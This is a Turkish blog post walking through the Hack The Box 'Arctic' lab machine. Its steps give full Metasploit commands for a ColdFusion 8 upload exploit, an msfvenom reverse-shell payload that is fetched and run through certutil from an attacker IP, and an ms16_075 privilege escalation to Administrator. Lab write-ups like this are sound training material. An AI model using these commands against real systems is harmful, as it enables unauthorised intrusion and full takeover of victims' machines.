Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Arctic Çözümü

Hackthebox Arctic Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 4 dk okuma süresi
423 0
Hackthebox Arctic Çözümü 1

Bu yazımda Hackthebox Arctic Çözümü sizler için paylaşacağım.

1- İlk olarak nmap taraması yaparak başlıyorum.

Baktığımızda 3 port açık olduğunu gördüm. Sıra sıra inceledim ve işimize yarayacak 1 port tespit ettim.

8500 porta tarayıcı üzerinden erişim sağlamaya çalışıyorum.

2-   http://10.10.10.11:8500/CFIDE/administrator/ adresine gittiğimizde login sayfası karşılıyor.

Coldfusıon 8 için exploit aramaya başlıyorum. Exploit ile makine içerisine sızabiliriz.

3- Metasploit üzerinden arama yapıyorum. msfconsole yazarak metasploit çalıştırabilirsiniz.

Araştırmaya başladığımda Coldfusion upload zafiyeti için yazılmış bir exploit keşfettim.

2009’da keşfedilmiş ve denendiği için bu exploit ile makineye sızabileceğimizi düşünüyorum.

4-  Sıra sıra aşağıdaki komutları yazarak exploit ayarlarını yapalım ve çalıştıralım.

  1. use exploit/windows/http/coldfusion_fckeditor
  2. set RHOSTS 10.10.10.11
  3. set RPORT 8500
  4. set LHOST Vpn ip adresiniz
  5. set HTTPCLIENTTIMEOUT 150
  6. run

Yazdığımızda direkt olarak sisteme girmiş oluyoruz.

5- Shell yazdığımızda direk içerisine girmiş oluyoruz.

type \Users\tolis\Desktop\user.txt  komutu ile direkt user.txt olarak ilk bayrağımızı buluyoruz.

İlginizi çekebilecek yazımız: Web Güvenliğinde Bilinmesi Gerekenler: XSS Açığı ve Önleme Yöntemleri

6- Detaylı olarak sistemi görmek için inceliyorum.

Windows 2008 olduğunu keşfettim. Baya eski bir işletim sistemi var buradan devam ederek uygun exploit arayarak yetki yükseltmeye çalışacağım.

Rahatlıkla yetki yükseltebileceğimizi keşfediyorum.

7-  Yeni bir terminal açıp sırasıyla  msfvenom üzerinden .exe olarak shell oluşturuyoruz.

  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -a x64 -f exe > siberguvenlik.exe
  • python3 -m http.server 80

8- Terminal üzerinden sıfırdan msfconsole yazarak 2. bir metasploit ayarlıyoruz. Önceki maddelerde sızdığımız metasploit açık kalsın bunu yan terminalden açabilirsiniz.

Sırasıyla;

  1. use exploit/multi/handler
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST vpn ip adresiniz
  4. set LPORT 9001
  5. run

Diğer metasploit içerisine geçiş yapıyoruz.

9- Sırasıyla;

  1. cd \Windows\Tasks\
  2. certutil.exe -urlcache -split -f “http://10.10.16.3/siberguvenlik.exe” siberguvenlik.exe
  3. siberguvenlik.exe

Çalıştığı anda direkt olarak diğer metasploit içerisine ayarladığımız yere bağlantı gidecektir.

10- Evet bağlantı gelmiş. Şimdi buradan yetki yükseltmek için exploit arayacağım.

run multi/recon/local_exploit_suggester yazarak yetki yükseltmek için exploitleri bulmasını istiyorum.

Hackthebox Arctic Çözümü

11- Çok fazla exploit çıktı çoğunu denedim ve çalışmadı.

ms16_075 olan exploit ile direkt olarak administrator içerisine geçiş yapabiliriz.

Hackthebox Arctic Çözümü

12-  Sırasıyla;

  • background
  • use exploit/windows/local/ms16_075_reflection_juicy
  • set LHOST vpn ip adresiniz
  • set SESSION 1
  • run

Evet kendi yetki yükseltmek için exploiti çalıştırdı ve direkt olarak administrator içerisine geçiş yaptık.

Hackthebox Arctic Çözümü

13- shell yazdık ve direkt administrator olarak içerisindeyiz.

type C:\Users\Administrator\Desktop\root.txt yazarak son bayrağı da bulabilirsiniz.

 

Hackthebox Arctic Çözümü

Hackthebox Arctic Çözümü yazımızın sonuna geldik. Yeni yazılarda görüşmek üzere..

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir